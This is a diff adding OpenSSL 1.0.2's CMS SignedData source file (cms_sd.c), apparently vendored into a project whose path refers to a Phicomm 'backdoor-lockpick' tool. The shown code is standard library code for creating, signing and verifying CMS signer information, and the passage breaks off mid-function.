+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.c
@@ -0,0 +1,955 @@
+/* crypto/cms/cms_sd.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include "cms_lcl.h"
+#include "asn1_locl.h"
+
+/* CMS SignedData Utilities */
+
+DECLARE_ASN1_ITEM(CMS_SignedData)
+
+static CMS_SignedData *cms_get0_signed(CMS_ContentInfo *cms)
+{
+    if (OBJ_obj2nid(cms->contentType) != NID_pkcs7_signed) {
+        CMSerr(CMS_F_CMS_GET0_SIGNED, CMS_R_CONTENT_TYPE_NOT_SIGNED_DATA);
+        return NULL;
+    }
+    return cms->d.signedData;
+}
+
+static CMS_SignedData *cms_signed_data_init(CMS_ContentInfo *cms)
+{
+    if (cms->d.other == NULL) {
+        cms->d.signedData = M_ASN1_new_of(CMS_SignedData);
+        if (!cms->d.signedData) {
+            CMSerr(CMS_F_CMS_SIGNED_DATA_INIT, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        cms->d.signedData->version = 1;
+        cms->d.signedData->encapContentInfo->eContentType =
+            OBJ_nid2obj(NID_pkcs7_data);
+        cms->d.signedData->encapContentInfo->partial = 1;
+        ASN1_OBJECT_free(cms->contentType);
+        cms->contentType = OBJ_nid2obj(NID_pkcs7_signed);
+        return cms->d.signedData;
+    }
+    return cms_get0_signed(cms);
+}
+
+/* Just initialize SignedData e.g. for certs only structure */
+
+int CMS_SignedData_init(CMS_ContentInfo *cms)
+{
+    if (cms_signed_data_init(cms))
+        return 1;
+    else
+        return 0;
+}
+
+/* Check structures and fixup version numbers (if necessary) */
+
+static void cms_sd_set_version(CMS_SignedData *sd)
+{
+    int i;
+    CMS_CertificateChoices *cch;
+    CMS_RevocationInfoChoice *rch;
+    CMS_SignerInfo *si;
+
+    for (i = 0; i < sk_CMS_CertificateChoices_num(sd->certificates); i++) {
+        cch = sk_CMS_CertificateChoices_value(sd->certificates, i);
+        if (cch->type == CMS_CERTCHOICE_OTHER) {
+            if (sd->version < 5)
+                sd->version = 5;
+        } else if (cch->type == CMS_CERTCHOICE_V2ACERT) {
+            if (sd->version < 4)
+                sd->version = 4;
+        } else if (cch->type == CMS_CERTCHOICE_V1ACERT) {
+            if (sd->version < 3)
+                sd->version = 3;
+        }
+    }
+
+    for (i = 0; i < sk_CMS_RevocationInfoChoice_num(sd->crls); i++) {
+        rch = sk_CMS_RevocationInfoChoice_value(sd->crls, i);
+        if (rch->type == CMS_REVCHOICE_OTHER) {
+            if (sd->version < 5)
+                sd->version = 5;
+        }
+    }
+
+    if ((OBJ_obj2nid(sd->encapContentInfo->eContentType) != NID_pkcs7_data)
+        && (sd->version < 3))
+        sd->version = 3;
+
+    for (i = 0; i < sk_CMS_SignerInfo_num(sd->signerInfos); i++) {
+        si = sk_CMS_SignerInfo_value(sd->signerInfos, i);
+        if (si->sid->type == CMS_SIGNERINFO_KEYIDENTIFIER) {
+            if (si->version < 3)
+                si->version = 3;
+            if (sd->version < 3)
+                sd->version = 3;
+        } else if (si->version < 1)
+            si->version = 1;
+    }
+
+    if (sd->version < 1)
+        sd->version = 1;
+
+}
+
+/* Copy an existing messageDigest value */
+
+static int cms_copy_messageDigest(CMS_ContentInfo *cms, CMS_SignerInfo *si)
+{
+    STACK_OF(CMS_SignerInfo) *sinfos;
+    CMS_SignerInfo *sitmp;
+    int i;
+    sinfos = CMS_get0_SignerInfos(cms);
+    for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+        ASN1_OCTET_STRING *messageDigest;
+        sitmp = sk_CMS_SignerInfo_value(sinfos, i);
+        if (sitmp == si)
+            continue;
+        if (CMS_signed_get_attr_count(sitmp) < 0)
+            continue;
+        if (OBJ_cmp(si->digestAlgorithm->algorithm,
+                    sitmp->digestAlgorithm->algorithm))
+            continue;
+        messageDigest = CMS_signed_get0_data_by_OBJ(sitmp,
+                                                    OBJ_nid2obj
+                                                    (NID_pkcs9_messageDigest),
+                                                    -3, V_ASN1_OCTET_STRING);
+        if (!messageDigest) {
+            CMSerr(CMS_F_CMS_COPY_MESSAGEDIGEST,
+                   CMS_R_ERROR_READING_MESSAGEDIGEST_ATTRIBUTE);
+            return 0;
+        }
+
+        if (CMS_signed_add1_attr_by_NID(si, NID_pkcs9_messageDigest,
+                                        V_ASN1_OCTET_STRING,
+                                        messageDigest, -1))
+            return 1;
+        else
+            return 0;
+    }
+    CMSerr(CMS_F_CMS_COPY_MESSAGEDIGEST, CMS_R_NO_MATCHING_DIGEST);
+    return 0;
+}
+
+int cms_set1_SignerIdentifier(CMS_SignerIdentifier *sid, X509 *cert, int type)
+{
+    switch (type) {
+    case CMS_SIGNERINFO_ISSUER_SERIAL:
+        if (!cms_set1_ias(&sid->d.issuerAndSerialNumber, cert))
+            return 0;
+        break;
+
+    case CMS_SIGNERINFO_KEYIDENTIFIER:
+        if (!cms_set1_keyid(&sid->d.subjectKeyIdentifier, cert))
+            return 0;
+        break;
+
+    default:
+        CMSerr(CMS_F_CMS_SET1_SIGNERIDENTIFIER, CMS_R_UNKNOWN_ID);
+        return 0;
+    }
+
+    sid->type = type;
+
+    return 1;
+}
+
+int cms_SignerIdentifier_get0_signer_id(CMS_SignerIdentifier *sid,
+                                        ASN1_OCTET_STRING **keyid,
+                                        X509_NAME **issuer,
+                                        ASN1_INTEGER **sno)
+{
+    if (sid->type == CMS_SIGNERINFO_ISSUER_SERIAL) {
+        if (issuer)
+            *issuer = sid->d.issuerAndSerialNumber->issuer;
+        if (sno)
+            *sno = sid->d.issuerAndSerialNumber->serialNumber;
+    } else if (sid->type == CMS_SIGNERINFO_KEYIDENTIFIER) {
+        if (keyid)
+            *keyid = sid->d.subjectKeyIdentifier;
+    } else
+        return 0;
+    return 1;
+}
+
+int cms_SignerIdentifier_cert_cmp(CMS_SignerIdentifier *sid, X509 *cert)
+{
+    if (sid->type == CMS_SIGNERINFO_ISSUER_SERIAL)
+        return cms_ias_cert_cmp(sid->d.issuerAndSerialNumber, cert);
+    else if (sid->type == CMS_SIGNERINFO_KEYIDENTIFIER)
+        return cms_keyid_cert_cmp(sid->d.subjectKeyIdentifier, cert);
+    else
+        return -1;
+}
+
+static int cms_sd_asn1_ctrl(CMS_SignerInfo *si, int cmd)
+{
+    EVP_PKEY *pkey = si->pkey;
+    int i;
+    if (!pkey->ameth || !pkey->ameth->pkey_ctrl)
+        return 1;
+    i = pkey->ameth->pkey_ctrl(pkey, ASN1_PKEY_CTRL_CMS_SIGN, cmd, si);
+    if (i == -2) {
+        CMSerr(CMS_F_CMS_SD_ASN1_CTRL, CMS_R_NOT_SUPPORTED_FOR_THIS_KEY_TYPE);
+        return 0;
+    }
+    if (i <= 0) {
+        CMSerr(CMS_F_CMS_SD_ASN1_CTRL, CMS_R_CTRL_FAILURE);
+        return 0;
+    }
+    return 1;
+}
+
+CMS_SignerInfo *CMS_add1_signer(CMS_ContentInfo *cms,
+                                X509 *signer, EVP_PKEY *pk, const EVP_MD *md,
+                                unsigned int flags)
+{
+    CMS_SignedData *sd;
+    CMS_SignerInfo *si = NULL;
+    X509_ALGOR *alg;
+    int i, type;
+    if (!X509_check_private_key(signer, pk)) {
+        CMSerr(CMS_F_CMS_ADD1_SIGNER,
+               CMS_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE);
+        return NULL;
+    }
+    sd = cms_signed_data_init(cms);
+    if (!sd)
+        goto err;
+    si = M_ASN1_new_of(CMS_SignerInfo);
+    if (!si)
+        goto merr;
+    X509_check_purpose(signer, -1, -1);
+
+    CRYPTO_add(&pk->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    CRYPTO_add(&signer->references, 1, CRYPTO_LOCK_X509);
+
+    si->pkey = pk;
+    si->signer = signer;
+    EVP_MD_CTX_init(&si->mctx);
+    si->pctx = NULL;
+
+    if (flags & CMS_USE_KEYID) {
+        si->version = 3;
+        if (sd->version < 3)
+            sd->version = 3;
+        type = CMS_SIGNERINFO_KEYIDENTIFIER;
+    } else {
+        type = CMS_SIGNERINFO_ISSUER_SERIAL;
+        si->version = 1;
+    }
+
+    if (!cms_set1_SignerIdentifier(si->sid, signer, type))
+        goto err;
+
+    if (md == NULL) {
+        int def_nid;
+        if (EVP_PKEY_get_default_digest_nid(pk, &def_nid) <= 0)
+            goto err;
+        md = EVP_get_digestbynid(def_nid);
+        if (md == NULL) {
+            CMSerr(CMS_F_CMS_ADD1_SIGNER, CMS_R_NO_DEFAULT_DIGEST);
+            goto err;
+        }
+    }
+
+    if (!md) {
+        CMSerr(CMS_F_CMS_ADD1_SIGNER, CMS_R_NO_DIGEST_SET);
+        goto err;
+    }
+
+    cms_DigestAlgorithm_set(si->digestAlgorithm, md);
+
+    /* See if digest is present in digestAlgorithms */
+    for (i = 0; i < sk_X509_ALGOR_num(sd->digestAlgorithms); i++) {
+        ASN1_OBJECT *aoid;
+        alg = sk_X509_ALGOR_value(sd->digestAlgorithms, i);
+        X509_ALGOR_get0(&aoid, NULL, NULL, alg);
+        if (OBJ_obj2nid(aoid) == EVP_MD_type(md))
+            break;
+    }
+
+    if (i == sk_X509_ALGOR_num(sd->digestAlgorithms)) {
+        alg = X509_ALGOR_new();
+        if (!alg)
+            goto merr;
+        cms_DigestAlgorithm_set(alg, md);
+        if (!sk_X509_ALGOR_push(sd->digestAlgorithms, alg)) {
+            X509_ALGOR_free(alg);
+            goto merr;
+        }
+    }
+
+    if (!(flags & CMS_KEY_PARAM) && !cms_sd_asn1_ctrl(si, 0))
+        goto err;
+    if (!(flags & CMS_NOATTR)) {
+        /*
+         * Initialialize signed attributes strutucture so other attributes
+         * such as signing time etc are added later even if we add none here.
+         */
+        if (!si->signedAttrs) {
+            si->signedAttrs = sk_X509_ATTRIBUTE_new_null();
+            if (!si->signedAttrs)
+                goto merr;
+        }
+
+        if (!(flags & CMS_NOSMIMECAP)) {
+            STACK_OF(X509_ALGOR) *smcap = NULL;
+            i = CMS_add_standard_smimecap(&smcap);
+            if (i)
+                i = CMS_add_smimecap(si, smcap);
+            sk_X509_ALGOR_pop_free(smcap, X509_ALGOR_free);
+            if (!i)
+                goto merr;
+        }
+        if (flags & CMS_REUSE_DIGEST) {
+            if (!cms_copy_messageDigest(cms, si))
+                goto err;
+            if (!(flags & (CMS_PARTIAL | CMS_KEY_PARAM)) &&
+                !CMS_SignerInfo_sign(si))
+                goto err;
+        }
+    }
+
+    if (!(flags & CMS_NOCERTS)) {
+        /* NB ignore -1 return for duplicate cert */
+        if (!CMS_add1_cert(cms, signer))
+            goto merr;
+    }
+
+    if (flags & CMS_KEY_PARAM) {
+        if (flags & CMS_NOATTR) {
+            si->pctx = EVP_PKEY_CTX_new(si->pkey, NULL);
+            if (!si->pctx)
+                goto err;
+            if (EVP_PKEY_sign_init(si->pctx) <= 0)
+                goto err;
+            if (EVP_PKEY_CTX_set_signature_md(si->pctx, md) <= 0)
+                goto err;
+        } else if (EVP_DigestSignInit(&si->mctx, &si->pctx, md, NULL, pk) <=
+                   0)
+            goto err;
+    }
+
+    if (!sd->signerInfos)
+        sd->signerInfos = sk_CMS_SignerInfo_new_null();
+    if (!sd->signerInfos || !sk_CMS_SignerInfo_push(sd->signerInfos, si))
+        goto merr;
+
+    return si;
+
+ merr:
+    CMSerr(CMS_F_CMS_ADD1_SIGNER, ERR_R_MALLOC_FAILURE);
+ err:
+    if (si)
+        M_ASN1_free_of(si, CMS_SignerInfo);
+    return NULL;
+
+}
+
+static int cms_add1_signingTime(CMS_SignerInfo *si, ASN1_TIME *t)
+{
+    ASN1_TIME *tt;
+    int r = 0;
+    if (t)
+        tt = t;
+    else
+        tt = X509_gmtime_adj(NULL, 0);
+
+    if (!tt)
+        goto merr;
+
+    if (CMS_signed_add1_attr_by_NID(si, NID_pkcs9_signingTime,
+                                    tt->type, tt, -1) <= 0)
+        goto merr;
+
+    r = 1;
+
+ merr:
+
+    if (!t)
+        ASN1_TIME_free(tt);
+
+    if (!r)
+        CMSerr(CMS_F_CMS_ADD1_SIGNINGTIME, ERR_R_MALLOC_FAILURE);
+
+    return r;
+
+}
+
+EVP_PKEY_CTX *CMS_SignerInfo_get0_pkey_ctx(CMS_SignerInfo *si)
+{
+    return si->pctx;
+}
+
+EVP_MD_CTX *CMS_SignerInfo_get0_md_ctx(CMS_SignerInfo *si)
+{
+    return &si->mctx;
+}
+
+STACK_OF(CMS_SignerInfo) *CMS_get0_SignerInfos(CMS_ContentInfo *cms)
+{
+    CMS_SignedData *sd;
+    sd = cms_get0_signed(cms);
+    if (!sd)
+        return NULL;
+    return sd->signerInfos;
+}
+
+STACK_OF(X509) *CMS_get0_signers(CMS_ContentInfo *cms)
+{
+    STACK_OF(X509) *signers = NULL;
+    STACK_OF(CMS_SignerInfo) *sinfos;
+    CMS_SignerInfo *si;
+    int i;
+    sinfos = CMS_get0_SignerInfos(cms);
+    for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+        si = sk_CMS_SignerInfo_value(sinfos, i);
+        if (si->signer) {
+            if (!signers) {
+                signers = sk_X509_new_null();
+                if (!signers)
+                    return NULL;
+            }
+            if (!sk_X509_push(signers, si->signer)) {
+                sk_X509_free(signers);
+                return NULL;
+            }
+        }
+    }
+    return signers;
+}
+
+void CMS_SignerInfo_set1_signer_cert(CMS_SignerInfo *si, X509 *signer)
+{
+    if (signer) {
+        CRYPTO_add(&signer->references, 1, CRYPTO_LOCK_X509);
+        if (si->pkey)
+            EVP_PKEY_free(si->pkey);
+        si->pkey = X509_get_pubkey(signer);
+    }
+    if (si->signer)
+        X509_free(si->signer);
+    si->signer = signer;
+}
+
+int CMS_SignerInfo_get0_signer_id(CMS_SignerInfo *si,
+                                  ASN1_OCTET_STRING **keyid,
+                                  X509_NAME **issuer, ASN1_INTEGER **sno)
+{
+    return cms_SignerIdentifier_get0_signer_id(si->sid, keyid, issuer, sno);
+}
+
+int CMS_SignerInfo_cert_cmp(CMS_SignerInfo *si, X509 *cert)
+{
+    return cms_SignerIdentifier_cert_cmp(si->sid, cert);
+}
+
+int CMS_set1_signers_certs(CMS_ContentInfo *cms, STACK_OF(X509) *scerts,
+                           unsigned int flags)
+{
+    CMS_SignedData *sd;
+    CMS_SignerInfo *si;
+    CMS_CertificateChoices *cch;
+    STACK_OF(CMS_CertificateChoices) *certs;
+    X509 *x;
+    int i, j;
+    int ret = 0;
+    sd = cms_get0_signed(cms);
+    if (!sd)
+        return -1;
+    certs = sd->certificates;
+    for (i = 0; i < sk_CMS_SignerInfo_num(sd->signerInfos); i++) {
+        si = sk_CMS_SignerInfo_value(sd->signerInfos, i);
+        if (si->signer)
+            continue;
+
+        for (j = 0; j < sk_X509_num(scerts); j++) {
+            x = sk_X509_value(scerts, j);
+            if (CMS_SignerInfo_cert_cmp(si, x) == 0) {
+                CMS_SignerInfo_set1_signer_cert(si, x);
+                ret++;
+                break;
+            }
+        }
+
+        if (si->signer || (flags & CMS_NOINTERN))
+            continue;
+
+        for (j = 0; j < sk_CMS_CertificateChoices_num(certs); j++) {
+            cch = sk_CMS_CertificateChoices_value(certs, j);
+            if (cch->type != 0)
+                continue;
+            x = cch->d.certificate;
+            if (CMS_SignerInfo_cert_cmp(si, x) == 0) {
+                CMS_SignerInfo_set1_signer_cert(si, x);
+                ret++;
+                break;
+            }
+        }
+    }
+    return ret;
+}
+
+void CMS_SignerInfo_get0_algs(CMS_SignerInfo *si, EVP_PKEY **pk,
+                              X509 **signer, X509_ALGOR **pdig,
+                              X509_ALGOR **psig)
+{
+    if (pk)
+        *pk = si->pkey;
+    if (signer)
+        *signer = si->signer;
+    if (pdig)
+        *pdig = si->digestAlgorithm;
+    if (psig)
+        *psig = si->signatureAlgorithm;
+}
+
+ASN1_OCTET_STRING *CMS_SignerInfo_get0_signature(CMS_SignerInfo *si)
+{
+    return si->signature;
+}
+
+static int cms_SignerInfo_content_sign(CMS_ContentInfo *cms,
+                                       CMS_SignerInfo *si, BIO *chain)
+{
+    EVP_MD_CTX mctx;
+    int r = 0;
+    EVP_PKEY_CTX *pctx = NULL;
+    EVP_MD_CTX_init(&mctx);
+
+    if (!si->pkey) {
+        CMSerr(CMS_F_CMS_SIGNERINFO_CONTENT_SIGN, CMS_R_NO_PRIVATE_KEY);
+        return 0;
+    }
+
+    if (!cms_DigestAlgorithm_find_ctx(&mctx, chain, si->digestAlgorithm))
+        goto err;
+    /* Set SignerInfo algortihm details if we used custom parametsr */
+    if (si->pctx && !cms_sd_asn1_ctrl(si, 0))
+        goto err;
+
+    /*
+     * If any signed attributes calculate and add messageDigest attribute
+     */
+
+    if (CMS_signed_get_attr_count(si) >= 0) {
+        ASN1_OBJECT *ctype =
+            cms->d.signedData->encapContentInfo->eContentType;
+        unsigned char md[EVP_MAX_MD_SIZE];
+        unsigned int mdlen;
+        if (!EVP_DigestFinal_ex(&mctx, md, &mdlen))
+            goto err;
+        if (!CMS_signed_add1_attr_by_NID(si, NID_pkcs9_messageDigest,
+                                         V_ASN1_OCTET_STRING, md, mdlen))
+            goto err;
+        /* Copy content type across */
+        if (CMS_signed_add1_attr_by_NID(si, NID_pkcs9_contentType,
+                                        V_ASN1_OBJECT, ctype, -1) <= 0)
+            goto err;
+        if (!CMS_SignerInfo_sign(si))
+            goto err;
+    } else if (si->pctx) {
+        unsigned char *sig;
+        size_t siglen;
+        unsigned char md[EVP_MAX_MD_SIZE];
+        unsigned int mdlen;
+        pctx = si->pctx;
+        if (!EVP_DigestFinal_ex(&mctx, md, &mdlen))
+            goto err;
+        siglen = EVP_PKEY_size(si->pkey);
+        sig = OPENSSL_malloc(siglen);
+        if (!sig) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_CONTENT_SIGN, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (EVP_PKEY_sign(pctx, sig, &siglen, md, mdlen) <= 0)
+            goto err;
+        ASN1_STRING_set0(si->signature, sig, siglen);
+    } else {
+        unsigned char *sig;
+        unsigned int siglen;
+        sig = OPENSSL_malloc(EVP_PKEY_size(si->pkey));
+        if (!sig) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_CONTENT_SIGN, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (!EVP_SignFinal(&mctx, sig, &siglen, si->pkey)) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_CONTENT_SIGN, CMS_R_SIGNFINAL_ERROR);
+            OPENSSL_free(sig);
+            goto err;
+        }
+        ASN1_STRING_set0(si->signature, sig, siglen);
+    }
+
+    r = 1;
+
+ err:
+    EVP_MD_CTX_cleanup(&mctx);
+    if (pctx)
+        EVP_PKEY_CTX_free(pctx);
+    return r;
+
+}
+
+int cms_SignedData_final(CMS_ContentInfo *cms, BIO *chain)
+{
+    STACK_OF(CMS_SignerInfo) *sinfos;
+    CMS_SignerInfo *si;
+    int i;
+    sinfos = CMS_get0_SignerInfos(cms);
+    for (i = 0; i < sk_CMS_SignerInfo_num(sinfos); i++) {
+        si = sk_CMS_SignerInfo_value(sinfos, i);
+        if (!cms_SignerInfo_content_sign(cms, si, chain))
+            return 0;
+    }
+    cms->d.signedData->encapContentInfo->partial = 0;
+    return 1;
+}
+
+int CMS_SignerInfo_sign(CMS_SignerInfo *si)
+{
+    EVP_MD_CTX *mctx = &si->mctx;
+    EVP_PKEY_CTX *pctx;
+    unsigned char *abuf = NULL;
+    int alen;
+    size_t siglen;
+    const EVP_MD *md = NULL;
+
+    md = EVP_get_digestbyobj(si->digestAlgorithm->algorithm);
+    if (md == NULL)
+        return 0;
+
+    if (CMS_signed_get_attr_by_NID(si, NID_pkcs9_signingTime, -1) < 0) {
+        if (!cms_add1_signingTime(si, NULL))
+            goto err;
+    }
+
+    if (si->pctx)
+        pctx = si->pctx;
+    else {
+        EVP_MD_CTX_init(mctx);
+        if (EVP_DigestSignInit(mctx, &pctx, md, NULL, si->pkey) <= 0)
+            goto err;
+    }
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_SIGN,
+                          EVP_PKEY_CTRL_CMS_SIGN, 0, si) <= 0) {
+        CMSerr(CMS_F_CMS_SIGNERINFO_SIGN, CMS_R_CTRL_ERROR);
+        goto err;
+    }
+
+    alen = ASN1_item_i2d((ASN1_VALUE *)si->signedAttrs, &abuf,
+                         ASN1_ITEM_rptr(CMS_Attributes_Sign));
+    if (!abuf)
+        goto err;
+    if (EVP_DigestSignUpdate(mctx, abuf, alen) <= 0)
+        goto err;
+    if (EVP_DigestSignFinal(mctx, NULL, &siglen) <= 0)
+        goto err;
+    OPENSSL_free(abuf);
+    abuf = OPENSSL_malloc(siglen);
+    if (!abuf)
+        goto err;
+    if (EVP_DigestSignFinal(mctx, abuf, &siglen) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_ctrl(pctx, -1, EVP_PKEY_OP_SIGN,
+                          EVP_PKEY_CTRL_CMS_SIGN, 1, si) <= 0) {
+        CMSerr(CMS_F_CMS_SIGNERINFO_SIGN, CMS_R_CTRL_ERROR);
+        goto err;
+    }
+
+    EVP_MD_CTX_cleanup(mctx);
+
+    ASN1_STRING_set0(si->signature, abuf, siglen);
+
+    return 1;
+
+ err:
+    if (abuf)
+        OPENSSL_free(abuf);
+    EVP_MD_CTX_cleanup(mctx);
+    return 0;
+
+}
+
+int CMS_SignerInfo_verify(CMS_SignerInfo *si)
+{
+    EVP_MD_CTX *mctx = &si->mctx;
+    unsigned char *abuf = NULL;
+    int alen, r = -1;
+    const EVP_MD *md = NULL;
+
+    if (!si->pkey) {
+        CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY, CMS_R_NO_PUBLIC_KEY);
+        return -1;
+    }
+
+    md = EVP_get_digestbyobj(si->digestAlgorithm->algorithm);
+    if (md == NULL)
+        return -1;
+    EVP_MD_CTX_init(mctx);
+    if (EVP_DigestVerifyInit(mctx, &si->pctx, md, NULL, si->pkey) <= 0)
+        goto err;
+
+    if (!cms_sd_asn1_ctrl(si, 1))
+        goto err;
+
+    alen = ASN1_item_i2d((ASN1_VALUE *)si->signedAttrs, &abuf,
+                         ASN1_ITEM_rptr(CMS_Attributes_Verify));
+    if (!abuf)
+        goto err;
+    r = EVP_DigestVerifyUpdate(mctx, abuf, alen);
+    OPENSSL_free(abuf);
+    if (r <= 0) {
+        r = -1;
+        goto err;
+    }
+    r = EVP_DigestVerifyFinal(mctx,
+                              si->signature->data, si->signature->length);
+    if (r <= 0)
+        CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY, CMS_R_VERIFICATION_FAILURE);
+ err:
+    EVP_MD_CTX_cleanup(mctx);
+    return r;
+}
+
+/* Create a chain of digest BIOs from a CMS ContentInfo */
+
+BIO *cms_SignedData_init_bio(CMS_ContentInfo *cms)
+{
+    int i;
+    CMS_SignedData *sd;
+    BIO *chain = NULL;
+    sd = cms_get0_signed(cms);
+    if (!sd)
+        return NULL;
+    if (cms->d.signedData->encapContentInfo->partial)
+        cms_sd_set_version(sd);
+    for (i = 0; i < sk_X509_ALGOR_num(sd->digestAlgorithms); i++) {
+        X509_ALGOR *digestAlgorithm;
+        BIO *mdbio;
+        digestAlgorithm = sk_X509_ALGOR_value(sd->digestAlgorithms, i);
+        mdbio = cms_DigestAlgorithm_init_bio(digestAlgorithm);
+        if (!mdbio)
+            goto err;
+        if (chain)
+            BIO_push(chain, mdbio);
+        else
+            chain = mdbio;
+    }
+    return chain;
+ err:
+    if (chain)
+        BIO_free_all(chain);
+    return NULL;
+}
+
+int CMS_SignerInfo_verify_content(CMS_SignerInfo *si, BIO *chain)
+{
+    ASN1_OCTET_STRING *os = NULL;
+    EVP_MD_CTX mctx;
+    EVP_PKEY_CTX *pkctx = NULL;
+    int r = -1;
+    unsigned char mval[EVP_MAX_MD_SIZE];
+    unsigned int mlen;
+    EVP_MD_CTX_init(&mctx);
+    /* If we have any signed attributes look for messageDigest value */
+    if (CMS_signed_get_attr_count(si) >= 0) {
+        os = CMS_signed_get0_data_by_OBJ(si,
+                                         OBJ_nid2obj(NID_pkcs9_messageDigest),
+                                         -3, V_ASN1_OCTET_STRING);
+        if (!os) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT,
+                   CMS_R_ERROR_READING_MESSAGEDIGEST_ATTRIBUTE);
+            goto err;
+        }
+    }
+
+    if (!cms_DigestAlgorithm_find_ctx(&mctx, chain, si->digestAlgorithm))
+        goto err;
+
+    if (EVP_DigestFinal_ex(&mctx, mval, &mlen) <= 0) {
+        CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT,
+               CMS_R_UNABLE_TO_FINALIZE_CONTEXT);
+        goto err;
+    }
+
+    /* If messageDigest found compare it */
+
+    if (os) {
+        if (mlen != (unsigned int)os->length) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT,
+                   CMS_R_MESSAGEDIGEST_ATTRIBUTE_WRONG_LENGTH);
+            goto err;
+        }
+
+        if (memcmp(mval, os->data, mlen)) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT,
+                   CMS_R_VERIFICATION_FAILURE);
+            r = 0;
+        } else
+            r = 1;
+    } else {
+        const EVP_MD *md = EVP_MD_CTX_md(&mctx);
+        pkctx = EVP_PKEY_CTX_new(si->pkey, NULL);
+        if (EVP_PKEY_verify_init(pkctx) <= 0)
+            goto err;
+        if (EVP_PKEY_CTX_set_signature_md(pkctx, md) <= 0)
+            goto err;
+        si->pctx = pkctx;
+        if (!cms_sd_asn1_ctrl(si, 1))
+            goto err;
+        r = EVP_PKEY_verify(pkctx, si->signature->data,
+                            si->signature->length, mval, mlen);
+        if (r <= 0) {
+            CMSerr(CMS_F_CMS_SIGNERINFO_VERIFY_CONTENT,
+                   CMS_R_VERIFICATION_FAILURE);
+            r = 0;
+        }
+    }
+
+ err:
+    if (pkctx)
+        EVP_PKEY_CTX_free(pkctx);
+    EVP_MD_CTX_cleanup(&mctx);
+    return r;
+
+}
+
+int CMS_add_smimecap(CMS_SignerInfo *si, STACK_OF(X509_ALGOR) *algs)
+{
+    unsigned char *smder = NULL;
+    int smderlen, r;
+    smderlen = i2d_X509_ALGORS(algs, &smder);
+    if (smderlen <= 0)
+        return 0;
+    r = CMS_signed_add1_attr_by_NID(si, NID_SMIMECapabilities,
+                                    V_ASN1_SEQUENCE, smder, smderlen);
+    OPENSSL_free(smder);
+    return r;
+}
+
+int CMS_add_simple_smimecap(STACK_OF(X509_ALGOR) **algs,
+                            int algnid, int keysize)
+{
+    X509_ALGOR *alg;
+    ASN1_INTEGER *key = NULL;
+    if (keysize > 0) {
+        key = ASN1_INTEGER_new();
+        if (!key || !ASN1_INTEGER_set(key, keysize))
+            return 0;
+    }
+    alg = X509_ALGOR_new();
+    if (!alg) {
+        if (key)
+            ASN1_INTEGER_free(key);
+        return 0;
+    }
+
+    X509_ALGOR_set0(alg, OBJ_nid2obj(algnid),
+                    key ? V_ASN1_INTEGER : V_ASN1_UNDEF, key);
+    if (!*algs)
+        *algs = sk_X509_ALGOR_new_null();
+    if (!*algs || !sk_X509_ALGOR_push(*algs, alg)) {
